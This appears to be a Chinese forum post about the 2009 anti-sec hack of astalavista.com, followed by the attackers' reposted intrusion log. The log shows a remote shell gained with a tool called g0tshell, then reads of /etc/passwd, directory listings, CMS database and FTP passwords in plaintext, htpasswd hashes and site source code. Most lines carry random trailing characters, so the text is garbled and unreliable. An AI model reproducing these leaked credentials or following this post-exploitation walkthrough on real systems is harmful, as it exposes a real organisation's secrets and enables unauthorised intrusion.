里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
* D$ j; c- P I) s" Z& e
8 ]7 y( I$ J2 N- a: D[root@front3 ~]# curl -I litespeedtech.com
6 U; V3 o. _/ I; l7 Y0 b. ?HTTP/1.1 200 OK% t6 u( X. H* U# Z8 ] o, `: s9 D
Date: Fri, 05 Jun 2009 22:54:51 GMT7 |' P, X) e7 A7 g
Server: LiteSpeed% c; G9 c0 U- h
. | M7 f" L* w" W) ~2 H* U* w另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-2 P6 _( I" b& M. j$ n
+ h% U3 j, L4 e
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
3 H$ r+ p8 x& j* j' i1 {/ D7 A, r' T
- K3 j( c. [$ K) }, U/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ + P* i0 E" k$ T$ O0 ?$ q
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
+ } h R" A' l9 X- B1 q* _/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \) r5 B7 w. j e' k) D+ F
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /6 r+ j6 k; b( a% g
\/ \/ \/ \/ \/ \/ \/
; J2 P0 a- `- u/ O- ^# W The Hacking & Security Community9 ~" [# \2 h+ K
[+] Founded in 1997 by a hacker computer enthusiast
0 E' _$ o% h- o e[-] Exposed in 2009 by anti-sec group3 I8 n# S1 r; A3 o9 G( l
* N; K, [- N! m4 D( A
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
9 i* k7 T% G; n' }>> 03. Who’s behind the site?3 L6 ] V+ M2 {
>>
- k m2 n2 ]" L; c4 `) z, P>> A team of security and IT professionals, and a countless number of contributors from all over the world.- ?- M4 B: \. X$ L8 C/ e
5 c) X8 ?9 W, W: [* g2 F% u
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?9 D7 I7 |: ?8 l+ |# X7 G
>>
& `( i8 h8 z* H( {# ?>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
6 k3 J/ Z. k9 Mmilitary institutions.
, S% q6 t" a) Y9 p3 k>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
8 W, `( b8 R& [4 ]0 Q0 V& N) Q9 l* T9 b, T% ~3 c
Why has Astalavista been targeted?
8 v y( t1 v* ^! P! I2 B1 w0 e# i# p! M. T
Other than the fact that they are not doing any of this for the “community” but
& P1 x/ h% ?2 y. H/ `4 n2 B7 J! efor the money, they spread exploits for kids, claim to be a security community2 U( j& w1 Y' X+ g) R+ `8 ]) X) u
(with no real sense of security on their own servers), and they charge you $6.66
6 z+ H; M8 S* @- s7 W* u/ h& eper months to access a dead forum with a directory filled with public releases
( ^ W8 w0 h" E) c; j: N" {7 a4 dand outdated / broken services.
! e" ^1 B& t' l% B0 o$ t$ l; g3 W$ f. `# @& C& I0 S
We wanted to see how good that “team of security and IT professionals” really is.
: G) G' N- k$ m/ L5 E. l) }) W' ]% S! h6 s
Let’s begin.
0 u# s: h; D( E% ~1 p8 a2 \3 F# V' g0 W! F$ w2 }, a: D
anti-sec:~# ./g0tshell astalavista.com -p 80 m+ m" c: l. z( o m h
[+] Connecting to astalavista.com:80
, s/ Q9 S# b- ?2 ?) E4 K' R* n4 h[+] Grabbing banner…$ o' L; R" q2 ~: u; o0 s- D0 g. h. r
LiteSpeed4 l+ g% p( p% X7 g$ V1 J
[+] Injecting shellcode…; e2 y- y9 B! F0 \1 ^
[-] Wait for it
8 b; T7 O' u% i6 O) [
7 b6 ]+ K/ l& ?2 ^+ r: S[~] We g0tshell4 n7 V& q% o: P# h( |: B) r
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
& a5 A `! X' x1 r5 F7 Z6 i+ sID: uid=100(apache) gid=500(apache) groups=500(apache)
d, m% O# h' S3 @, z/ q+ u
7 }" c0 e( L* ^5 z7 m( k& J1 I# c K2 xsh-3.2$ cat /etc/passwd5 ~9 C4 @; X. N1 [, U) U
root:x:0:0:root:/root:/bin/bash. J( D; @. l1 A' m: A+ X# C/ a
bin:x:1:1:bin:/bin:/sbin/nologin
3 K( k; w' A. ^1 _1 pdaemon:x:2:2:daemon:/sbin:/sbin/nologin
7 l! r- E' O. S4 y' [, f) ~. `adm:x:3:4:adm:/var/adm:/sbin/nologin
) `9 c% q; x$ ?lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin" X+ W$ q, B+ f
sync:x:5:0:sync:/sbin:/bin/sync
0 T5 ^# L4 d, n5 kshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
$ s& V7 O4 T0 Z. o6 M; x3 n* Yhalt:x:7:0:halt:/sbin:/sbin/halt! O# h* _6 n& _) D3 w7 q
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
: _9 P; U- f H* G ~: I0 P" knews:x:9:13:news:/etc/news:* @( U# }* B' h( d2 n2 v( w
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin2 y; |, E2 s! N) ]
operator:x:11:0 perator:/root:/sbin/nologin
& E3 Q! F8 {6 q1 g! @ Cgames:x:12:100:games:/usr/games:/sbin/nologin [& D3 Q2 h5 w. z# q: E3 Q' a
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
0 S2 N1 y/ x; U/ p& I; [) dftp:x:14:50:FTP User:/var/ftp:/sbin/nologin$ S9 N" b# V, U* L0 k* P. E
nobody:x:99:99:Nobody:/:/sbin/nologin
$ i1 d5 t$ Q- h" m6 rrpm:x:37:37::/var/lib/rpm:/sbin/nologin
% o f) K4 K+ d& K# d$ Vdbus:x:81:81:System message bus:/:/sbin/nologin) @1 M8 s4 ]* A0 n9 A: ^
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin1 `& H1 |. ~7 y" y7 y Z: U7 D
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
% q) N" D% ~% {( ~smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin, Q* { V8 l; d' z/ {1 a) z( d* f
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- H: C6 z- T9 Q j, Rhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin# t( G B4 F P/ x( m
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin, C. o( B8 v( E8 L8 E1 M# K4 q
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin6 {/ ^& g6 `/ s+ M
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
, \5 z2 Q4 g, s" n: Jsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin. O0 [3 D% h" R) I' b
pcap:x:77:77::/var/arpwatch:/sbin/nologin/ n; {( V8 G; l# _% G+ I- F8 t
named:x:25:25:Named:/var/named:/sbin/nologin+ p" z5 I, e3 z; v
apache:x:100:500::/var/www:/bin/false' o+ @6 E) W- M6 @7 f5 h
diradmin:x:101:101::/usr/local/directadmin:/bin/bash/ |' j0 {# P' k; l" t( i% A
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash* R, y& O- K9 R+ e& C4 | p
webapps:x:500:501::/var/www/html:/bin/bash# q# x( ~1 b( e: q& w/ Y
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash, I4 G9 X. Q1 Z' Q' c
admin:x:501:502::/home/admin:/bin/bash: O% b7 o8 d( x* @
jon:x:502:503::/home/jon:/bin/bash
7 I6 Q, Z+ u) T; H2 ?" R. Hcom:x:503:504::/home/com:/bin/bash, L6 i6 z- h: D+ N5 X
ntp:x:38:38::/etc/ntp:/sbin/nologin, V: n0 d8 W+ s D& U) \* A
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin! m2 l. D0 W/ N D6 o# c3 ^
astanet:x:504:505::/home/astanet:/bin/bash
_6 D8 U( |' w) R: e Havahi:x:70:70:Avahi daemon:/:/sbin/nologin, H! ^% l: |' W2 f8 X( C" k1 U
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin& B( \. ?* K5 i/ `6 p
- d0 W5 N* y) H7 K. O( Wsh-3.2$ cat /etc/hosts* l& d; `, Y1 I8 ] {
# Do not remove the following line, or various programs
! [ K# S2 L7 ]# that require network functionality will fail.
, c% N! k* Y0 b- E127.0.0.1 localhost.localdomain localhost
- G- w+ l& Y3 B+ U. m::1 localhost6.localdomain6 localhost6
0 \. E7 v6 p7 K/ R80.74.154.172 asta1.astalavistaserver.com
* ~; l% }' T' ]) {" U/ ?; F2 \5 S* T# ]" J" S9 ^! D
sh-3.2$ pwd
* f. Y; F; Q- z3 E; K7 ~% ^/home/com/public_html
" [" R. x$ W* |( D5 U5 U1 r. Z+ z1 l* J
: i' P: [ b! psh-3.2$ ls -la* a, U+ F* o, L9 F) T. z/ Z) o+ ^* `
total 18460! M" o* k$ h3 w
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
! k+ l/ P5 c4 g6 l; i) j ]8 Idrwx–x–x 11 com com 4096 Jun 25 2008 ..( e, g+ k$ g g- H3 @
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
: J9 n4 i2 @3 {: w9 D1 Pdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
$ u4 a& D( B9 H( s& J( z$ @drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
# h. t( _$ x( p" [! B" C; @drwxrwxrwx 2 com com 4096 May 19 00:50 config& {0 p+ t' X4 ?! h
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
5 l" L6 k5 H4 S- L6 x4 ?drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules* F" U" N6 f% l
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing. L2 I7 M# n/ i9 H6 n
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
% H$ W. t6 I, ^5 hdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__. A2 X6 y$ ~( L- i* z: ?. Q
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php: T3 N* @% a6 }, o8 A
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd& K l1 |3 {) ]
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor4 `& n! a U$ X3 }" K4 ^6 Q
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
3 s3 O* J& w6 Y8 o, ?4 ddrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
% S/ Z- o+ p0 v-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess, Z# r! Y [' S9 e: Z
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
! z9 ~# d6 R! }5 v7 D2 W, v-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak- o2 c; v- S+ v0 u% P* T0 B
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
4 K: E4 A3 ]. N9 z4 n% Sdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images, p( v, }, h% t/ @6 v
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
. Y+ ]' D" m6 p1 Kdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer+ j0 S1 f8 V' s; n. v
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
; \8 h5 w3 R" i# d1 d- Ydrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
: n8 m1 q: B& A# E) s" l3 ]drwxrwxrwx 12 com com 4096 Jun 2 07:47 media, O# O3 K0 I# X8 b) z
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
: S( B6 R6 G# J% X3 rdrwxr-xr-x 34 com com 4096 May 28 16:30 modules9 M8 w8 W+ c* _, ?
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
) B7 K0 r2 W) U/ R2 l) d. ~ W: n7 udrwxrwxr-x 22 com com 4096 May 28 17:06 _new; p1 c$ o6 j% w- x5 _! i8 E9 g, Z
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old! j4 ~2 A3 W9 G
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy8 e+ N( y( {7 L
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy ]6 F' }1 Y" Q# P! T5 }" q
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt) E( g! y `# I/ |) I
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
, T- B/ n3 ^# J/ Z3 N7 H-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
' D& u: X8 _ L4 d7 C% z" {; ~) ]8 ?drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes* ~* _0 A$ m( y1 z( t3 d2 D& A
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
/ f& z* K% H) ?: W* l& Xdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam5 y8 K( _. z: ^! G8 s& u9 y
. n) G% P# `# h6 I* ~" X5 J' s$ U4 ~
sh-3.2$ head -20 index.php
9 t5 t9 e' G; N( K, |( k, u1 l<?php
( e1 s+ ]- ~3 Q- h4 Z) y
; `' L$ h! H1 [2 G1 W* x/**
1 x7 ] C% x/ D' F: ?3 ` N" j( j* The main page for the CMS8 r0 B$ ^( [: k& G) K* m$ e
* @copyright CONTREXX CMS - COMVATION AG! r9 A4 U* H$ Z3 `- w7 Y) C/ U; O
* @author Comvation Development Team! r$ c+ N3 n* L2 @' Z
* @version v1.0.9.10.1 stable0 o5 ?2 _* B0 |/ x, t
* @package contrexx
7 R/ E; t; o4 Q* @subpackage core
3 g' J" `/ R9 m( t9 q$ @* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
5 O, k/ S, W% }" D* @since v0.0.0.0
- u' I8 S2 [$ G* @todo Capitalize all class names in project
# r+ `: I" H' u X* @uses /config/configuration.php) x1 |) M4 A4 N/ Y. M
* @uses /config/settings.php
. u- O* ?$ J% y* e" O$ c; [* @uses /config/version.php
2 B# S" I6 {" Y- h/ V T7 [* @uses /core/API.php* g: q0 h7 R0 E9 W- b
* @uses /core_modules/cache/index.class.php6 c5 b8 t! v- o
* @uses /core/error.class.php
6 A( s+ z$ U4 u" ^+ u6 q* @uses /core_modules/banner/index.class.php
8 F) c0 {: F6 p0 b7 D {3 |* @uses /core_modules/contact/index.class.php3 y' g& A2 \ K& z
8 o) b3 `" } \9 J8 osh-3.2$ cd config/) q, d4 g! l5 s
sh-3.2$ ls -la5 d$ P8 e; q0 D
total 32$ @* n" b3 I9 o6 V3 b# f
drwxrwxrwx 2 com com 4096 May 19 00:50 .4 L) H* T/ @, _2 J
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
( _" o: j5 b: L1 K4 \% \/ V-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php! F" Y3 L' }4 u" {
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php' T, F* }$ k/ i1 Y* t$ K) i
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php4 ~0 r+ v L' d2 {4 E- A' {( r
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
% K# g& k- u* Q0 K- y
% j [2 [0 ^' E) f2 wsh-3.2$ cat configuration.php/ D: _& { w9 N+ O4 u
[snip]. g& N! N9 l$ F$ Q+ l
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
# t" B. ~1 X6 S8 B8 R$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
9 b2 E' k1 W8 s; x- x$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix# C' X' F1 B: o
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username N4 A Z: |; @+ E
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password" C& e9 }# q( G# f; ?% p5 i
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)- f4 |* p4 N: }, \' E- Z { s1 y
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..) J( a c; |1 X$ I
[snip]/ ^; i* e. r# M/ H' l0 i, s
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
) [3 X S. \+ G' J4 E) F# e$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode0 b! y" S4 \- a4 J# p; E9 o
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost$ ~: [$ e2 V W; W) t
$_FTPCONFIG['port'] = 21; // Ftp remote port
- g& R/ `4 |6 h w: z$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
" S5 U) C A' h. w+ |# r) V# W5 _$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password5 \8 s" m. d3 ^
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
9 y7 b; A; o! o: J- e& Y
$ O4 r# x* A" R9 dsh-3.2$ cd ..
5 W) S' p% g8 e( h7 G& T1 k% Dsh-3.2$ cd dvd/
( B. H, C4 I- S- u$ j. Ash-3.2$ ls -la
3 e$ M3 V) S+ f& I7 i: \ D4 a8 |total 2913780
3 F; N/ M8 O; u" {. a; xdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
; i. X# s. m& T; C9 F% qdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..$ F6 c/ u# O. A' f
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar3 Q# e8 V6 w/ a+ T( F. l3 W
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar& p* B# `$ m3 W0 w' f
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
3 {. G" t& \1 @3 Y6 G7 U$ r-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
7 E0 a2 ]* |$ [$ \6 w+ q: |% K! j- V8 U7 ?* Q+ e
sh-3.2$ cat .htaccess+ q# a C# H( w* h0 s7 u% z( ]
authType Basic
% D& |3 y' y) CauthName DVD3 x2 S- h, f8 j. w0 A8 T1 H- c+ W
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd7 u$ ?! H0 P& R% f# i) z( p4 v9 |
require valid-user
+ [0 g6 m0 Q4 |. N8 _" t, e! F' }+ R0 Z& W6 K2 F
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd' J" s$ ?% b; c9 I% X) q
DVDdownload:CRD8cuY6.MPT6+ Q% x8 _5 ]# J3 m
DVDdownload2:CR8a36.wluFMg& ~& T- f$ F8 _/ U: a, M
K! T/ `3 `- |7 O# ish-3.2$ cat test.php
: h; l) B# D/ j$ b2 ~. n" O1 s$ q2 G<?php
+ {5 l8 z9 U" J! Q8 m) y/ ]. w% B6 ?$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;1 d s1 X" {! N; t5 C+ ?
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url))); B3 m' |4 f7 \: d+ G" ^
echo $url;4 }' E9 C! E1 i0 E
?>
. R( }3 F& n% a) Y V: a7 C% N8 d$ {% V8 b( d
sh-3.2$ cd modifications/
6 K- h5 K6 M8 X( {% Ksh-3.2$ ls -la
. _( c7 `* v% y& r2 _' G" N* z3 {total 32
* M0 H% S- D( p5 E* [drwxr-xr-x 8 com com 4096 May 11 12:48 .7 D1 z6 E' y7 F
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..6 Z+ y* B3 r" d- E3 p0 `! X1 p: L( I
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng: ^/ Q m( w0 q R
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs6 l8 T0 t: W* y
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
% J% |' @. _5 j9 u% a6 }( ~) n7 Kdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc( A3 X6 }- O+ y$ x# n' ]0 u, r
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search( o/ a2 ^( V. g; ]# S R4 x- E
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
* p1 _) B- ~; P$ \" x
# b5 ~6 ?+ e5 [7 K {! Ksh-3.2$ ls -R7 `) [( c4 A! W! f# {+ v
.:6 G, ^0 S, p$ H$ \# J
com_avtng cronjobs onlinetools pjirc search _tmp
* i6 B' w( f$ d- G; F- A; i
2 B" S, I% j( P1 d5 M0 [; B# [./com_avtng:
9 J; k5 G2 l- a7 a% i4 a1 Javtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts, d4 Q/ `( H! r
- M9 i0 x, S9 B; C0 m7 T& Z; }- E0 w ?./com_avtng/scripts:
# h0 ^5 {5 H) I# D2 Ipopunder.js
% C& ]* M( E' t1 t9 H
0 \3 b1 O/ {; X: W8 z% ?./cronjobs:* R9 t9 z' E! K
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
( H& E/ ]9 y) h* I' _! W/ m) p+ I. e8 N: c
./cronjobs/tmp:
' K4 Z) c0 ]3 H% W4 B8 wcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv+ Y; v( M3 j$ d1 U. p1 F
i: x1 y8 Z% N* C+ |3 R./onlinetools:. ~+ m- }) x4 s, r/ e' i' J+ e
index.php* i5 v. i0 B- j, q% e
% D1 Z- _5 O) f, q. W, l+ _/ w$ G6 Y& A./pjirc:
6 U, W# o, G% t8 C( J8 x, |a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt4 M* Z, F$ H$ C E. H" Z1 x$ u
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
: _# o* q3 E% j: p2 \background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
4 S( ?! P8 z9 y
: Z! q/ e0 M% k7 }./pjirc/img:- o( C8 i! K0 y8 I3 A6 n
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
! j& A0 M, u9 Sarbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
r0 I& q7 d! m0 j- w( rverre-eau.gif
/ G3 h. v3 r {argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
* Z$ M! j) A4 o5 k0 ^, t8 u/ \4 Gverre-vin.gif8 ?5 g, s" e5 t4 K, E6 Y
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif+ ]9 I5 P/ w" Q* p
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
* l p3 R) d6 n% z8 }" r
4 ^% m( ~; m, ^7 X./pjirc/snd:
# h. ^ u1 z$ Q3 zbell2.au ding.au) h l w" g; i' A
3 Y) G9 P' \' h, L% c* R
./search:2 C9 m" \* Q m
searchEngines.php search.php0 r$ h) n( B" S
' t1 e: q# x6 _+ r8 b% Z9 _% Y) U
./_tmp:* m7 ~, }' e$ {# c
defaultPorts.php defaultPorts.txt6 V2 U* L5 ]$ K- m, ]
1 R+ s6 \ ^5 d+ Fsh-3.2$ cd cronjobs/2 t3 v/ A9 O" x( h" l, T" }0 [' [
sh-3.2$ cat exploits.php- }- e, n F3 g) J# Q. L7 @
[snip]: [ K# O' T) i$ C5 N
$categories = array();
! B2 a; I0 y" q& E; |+ @$ ~3 S& l( o$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;' c, }( T2 [( v; {
$expolits = file($milw0rmFile);
7 m+ A, ]2 x9 J3 P; `4 Q$comExploits = array();
) P. I) V* \ @& n) ~[snip]- }. X0 v0 o* k$ v7 {
// manage data
U- [# L& Q# F% i% `5 i# m- X2 y: Sfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26401 P: e+ ~& `/ q6 }* F
: `: f3 v( a W4 |9 C' V: o
// get path and title7 y7 s7 Z2 k7 n% r2 k
$expolits[$x] = trim($expolits[$x]);
( o6 l( Z$ w2 w9 ?( W+ |) O $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));; k5 l9 Z! M$ S. {# Z0 a! C
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
+ E, J" g6 ?$ n) c9 u& h) N& R% x. j& f F. N3 q0 a" h! U
// check if file exists
8 D7 N7 @ Z, z2 m. Z3 t if (file_exists($path)) {
2 a7 |* l# `2 ~9 ~7 e1 {8 g$ R( m9 ~( ?! w# E5 G7 b9 g' z
$text = file_get_contents($path);; W# i& X5 B* s
* X9 \5 T$ m! e* l8 B
// get content and date- l; _' e- U$ c, `- d5 a" u; h+ X9 f
//$text = htmlspecialchars($text, ENT_QUOTES);, I2 i1 n Z( j8 D6 m0 L( R
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
/ g( x6 \& ~; A0 B if ($tmptext != ”) {
$ b5 ]3 ]$ \* M( p6 \. D/ ]3 w% S $text = $tmptext;
' W* ?# l+ {/ u+ N } else {
, k, A- k* G# X/ D0 x $text = addslashes(htmlentities($text, ENT_QUOTES));
& D: e7 p. b1 R/ S }2 u7 P% n' q" M: k ]) _+ x
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
$ U# x' l3 ]; p) z! L4 V- i $tmp = explode('-', $date);
5 x1 k8 \$ y2 y# T $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
, f) ?' D% n3 T' Z$ m! R C $cat = getCategory ($path);
1 U$ ^3 r( w- F: \ $ext = pathinfo(basename($path));
9 S/ \ [4 [( F2 i( X4 w $ext = $ext['extension'];! {9 c8 }( I$ U3 x! Z( A' J
$qStr = ”
+ Q* g* |+ R4 G3 a8 n B( T* T R SELECT `id`3 b# R* t7 G0 p0 A: Z& q) P
FROM `contrexx_module_exploits` }& e" i9 L0 j. r
WHERE `title` = ‘” . $title . “‘
) G2 E U2 ~) X. z AND `date` = ‘” . $date . “‘# ?4 B; l6 O( a
“;% f" Z. K, N: }/ s5 B
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;# h3 v* p$ U) Q9 ^1 y1 S t6 W
$q = $_objDB->query($qStr);
; T% P2 S4 m# e N, Q' H3 Y3 p8 c3 h6 A, _
if ($q->numRows() == 0) {
/ s: o( Z; ^5 ]) Q. T, f- V
d0 {* d: [; {/ ?2 v5 q // prepare array
+ c8 L. Y3 T' h/ g( X' i $comExploits[$x]['date'] = $date;
- J/ m2 N! `& ^( C2 i, Z $comExploits[$x]['title'] = $title;
3 ]: U" M8 Y& l& y $comExploits[$x]['author'] = ‘milw0rm’;
# x, \# ^8 G1 B g+ ]( P $comExploits[$x]['text'] = $text;
5 p, w i7 ~: ?. q( K $comExploits[$x]['source'] = $ext;" l+ W4 l H9 ?; F
$comExploits[$x]['url1'] = ”;
. r3 _3 z+ I. k3 b $comExploits[$x]['url2'] = ”;# c+ h1 M1 {2 R) Y0 Z( a
$comExploits[$x]['catid'] = $cat;
# }. W7 j7 K) ~: \% s. T* { $comExploits[$x]['lang'] = ‘2′;' K9 X R) [! v1 F: Y' I
$comExploits[$x]['userid'] = ‘12′;/ b' p3 G2 b5 ?/ z' U% e! o
$comExploits[$x]['startdate'] = ‘0000-00-00′;
2 g& t% h8 V' B- }$ A $comExploits[$x]['enddate'] = ‘0000-00-00′;
8 K1 e3 I/ x% m# \; l8 k $comExploits[$x]['status'] = ‘1′;
3 a; h3 N% o7 c9 T, q0 W7 S6 l/ b' I $comExploits[$x]['changelog'] = $date;
2 \( X) ^+ Z1 F. z5 \
. x: v2 D1 z, t6 H! X) K; E }
; _( {7 ?3 f% s3 ~9 i[snip]
5 X7 _1 u9 U) H+ A $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>4 m3 R8 B6 b4 j O& Z* l) P5 R
<rss version=”2.0″>
% Y' o& G( J" k <channel>0 B$ x3 L7 Y7 ?9 u6 D
<title>ASTALAVISTA.com - Exploits</title>
% ]! B0 ^ l% P- w/ | <link>http://www.astalavista.com/exploits</link>
